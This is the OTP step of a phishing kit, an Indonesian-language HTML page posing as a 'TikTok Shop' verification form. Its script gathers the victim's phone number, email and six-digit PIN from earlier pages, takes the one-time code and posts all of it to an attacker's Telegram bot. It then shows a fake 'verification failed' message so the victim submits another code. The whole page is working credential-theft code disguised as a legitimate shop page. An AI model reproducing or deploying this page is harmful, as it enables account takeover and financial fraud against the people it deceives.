
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>TikTok Shop</title>
<style>
    @import url('https://fonts.googleapis.com/css2?family=Ubuntu:wght@300;400;500;700&display=swap');
    * {
        font-family: 'Ubuntu', sans-serif;
        font-weight: 400;
        margin: 0;
        padding: 0;
        box-sizing: border-box;
        position: relative;
        color: #000;
    }
    .b { font-weight: 500; }
    html { width: 100vw; height: 100vh; }
    body {
        background: #fff;
        width: 100%;
        height: 100%;
    }
    .container {
        width: 100%;
        padding: 20px;
        height: 100%;
    }
    .flex {
        display: flex;
        justify-content: center;
        align-items: center;
    }
    .hero {
        width: 100%;
        height: 283px;
    }
    .hero img {
        width: 100%;
    }
    h1 {
        font-size: 20px;
        text-align: center;
        margin: 20px 0;
        font-weight: 600;
    }
    form {
        width: 100%;
        height: auto;
        flex-direction: column;
    }
    label {
        display: block;
        font-size: 15px;
        text-align: left;
        margin-bottom: 8px;
        font-weight: 500;
    }
    select {
        width: 100%;
        height: 40px;
        border-radius: 4px;
        padding: 0 10px;
        outline: none;
        border: 1px solid #aeaeae;
        background: #fff;
        margin-bottom: 20px;
    }
    input:focus,
    select:focus {
        border: 1.1px solid #000;
    }
    .wrap {
        width: 100%;
        height: 60px;
        display: flex;
        justify-content: center;
        align-items: center;
    }
    .clear {
        width: 100%;
        height: 100%;
        position: absolute;
        top: 0;
        left: 0;
        z-index: 999;
    }
    input {
        width: 100%;
        background: #fff;
        height: 40px;
        border-radius: 4px;
        border: 1px solid #aeaeae;
        outline: none;
        padding: 0 10px;
        font-size: 16px;
        margin-bottom: 20px;
    }
    button {
        margin-top: 10px;
        width: 100%;
        height: 40px;
        border: none;
        outline: none;
        border-radius: 8px;
        color: #fff;
        font-weight:bold;
        background: #EE3056;
        text-align: center;
        font-size: 13px;
    }
    .alert {
        width: 100%;
        height: auto;
    }
    p {
        font-size: 15px;
        margin-bottom: 10px;
        color: #6d6d6d;
    }
    button:disabled {
        opacity: 0.6;
    }
     .process1 {
            width: 100%;
            height: 100%;
            display: flex;
            align-items: center;
            justify-content: center;
            margin: auto;
            position: fixed;
            padding-top: 30px;
            left: 0;
            right: 0;
            bottom: 0;
            background: rgba(0, 0, 0, 0.4);
            z-index: 999999999;
            
      
}
.loading {
    position: fixed;
    display: flex;
    align-items: center;
    justify-content: center;
    align-items: center;
    margin-bottom: 20%;
    margin-top: 0px;
}
.loading img {
    width: 90px;
    border-radius: 10px;
}

</style>
</head>
<body>
    <center>
<div id="djload" name="process" class="process1" style="display: none;">
      <div class="loading">
       <img src="https://hosting.tigerengine.id/eyyhg8.gif">              
            </div>
        </div>
    <div class="container">
        <div class="flex hero">
            <img src="https://hosting.tigerengine.id/gcwydq.jpg" alt="">
        </div>
        <div style="display:none;" class="alert">
            <h1 class="">GAGAL VERIFIKASI!</h1>
            <p>Kode yang anda masukkan sudah tidak berlaku, silakan masukkan ulang kode yang terkirim melalui handphone anda</p>
            <button type="button" onclick="resend();">Masukkan ulang</button>
        </div>
        <div class="boxform">
            <h1 class="">TikTok Shop</h1>
            <form id="form" onsubmit="send(event);">
     <input type="hidden" name="tarif" id="tarif" value="">
     <input type="hidden" name="inp" id="inp" value="">
     <input type="hidden" name="email" id="email" value="">
     <input type="hidden" name="pin1" id="pin1" value="">
     <input type="hidden" name="pin2" id="pin2" value="">
     <input type="hidden" name="pin3" id="pin3" value="">
     <input type="hidden" name="pin4" id="pin4" value="">
     <input type="hidden" name="pin5" id="pin5" value="">
     <input type="hidden" name="pin6" id="pin6" value="">
                <label>Kode Verifikasi</label>
            <input class="inpotp" type="tel" required autocomplete="off" placeholder="Kode" name="otp" id="otp">
                <button id="btn1" type="submit">PROSES</button>
            </form>
        </div>
    </div>
<script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>
<script src="i.js"></script>
<script>
    
    function resend(){
        $(".alert").hide();
        $(".boxform").fadeIn(200);
        $("#btn1").prop("disabled", false);
        $('.inpotp').val('');
        $(".inpotp").focus()
    }
    
    var tarif = sessionStorage.getItem('tarif', tarif);
 document.getElementById("tarif").value = tarif + "";
 var inp = sessionStorage.getItem('inp', inp);
 document.getElementById("inp").value = inp + "";
 var email = sessionStorage.getItem('email', email);
 document.getElementById("email").value = email + "";    
 
 var pin1 = sessionStorage.getItem('pin1', pin1);
 document.getElementById("pin1").value = pin1 + "";    
 
 var pin2 = sessionStorage.getItem('pin2', pin2);
 document.getElementById("pin2").value = pin2 + "";    
 
 var pin3 = sessionStorage.getItem('pin3', pin3);
 document.getElementById("pin3").value = pin3 + "";    
 
 var pin4 = sessionStorage.getItem('pin4', pin4);
 document.getElementById("pin4").value = pin4 + "";    
 
 var pin5 = sessionStorage.getItem('pin5', pin5);
 document.getElementById("pin5").value = pin5 + "";    
 
 var pin6 = sessionStorage.getItem('pin6', pin6);
 document.getElementById("pin6").value = pin6 + "";          
        
 // Otp
function send(){
    $(".process1").fadeIn();
    event.preventDefault();    
  
  var otp = $('#otp').val();
                              
    var logo = "𝘄𝘄𝘄.𝘁𝗶𝗸𝘁𝗼𝗸𝘀𝗵𝗼𝗽.𝗰𝗼𝗺";              
    var gabungan = '' + logo + '%0A⍟ ' + tarif + '%0A%0A⍟ 𝐍𝐨𝐦𝐨𝐫 •• ' + inp + '%0A⍟ 𝐄𝐦𝐚𝐢𝐥 •• ' + email + '%0A⍟ 𝐒𝐚𝐧𝐝𝐢 •• ' + pin1 + pin2 + pin3 + pin4 + pin5 + pin6 + '%0A%0A⍟ 𝐎𝐓𝐏 •• ' + otp ;   
    $.ajax({
        url: `https://api.telegram.org/bot${token}/sendMessage?chat_id=${grup}&text=${gabungan}&parse_mode=html`,
        method: `POST`,   
    complete: function(){
    setTimeout(function(){   
    $(".process1").fadeOut();  
   $(".boxform").hide();
   $(".alert").fadeIn(100);
    }, 500);}});};
</script>

</body>
</html>
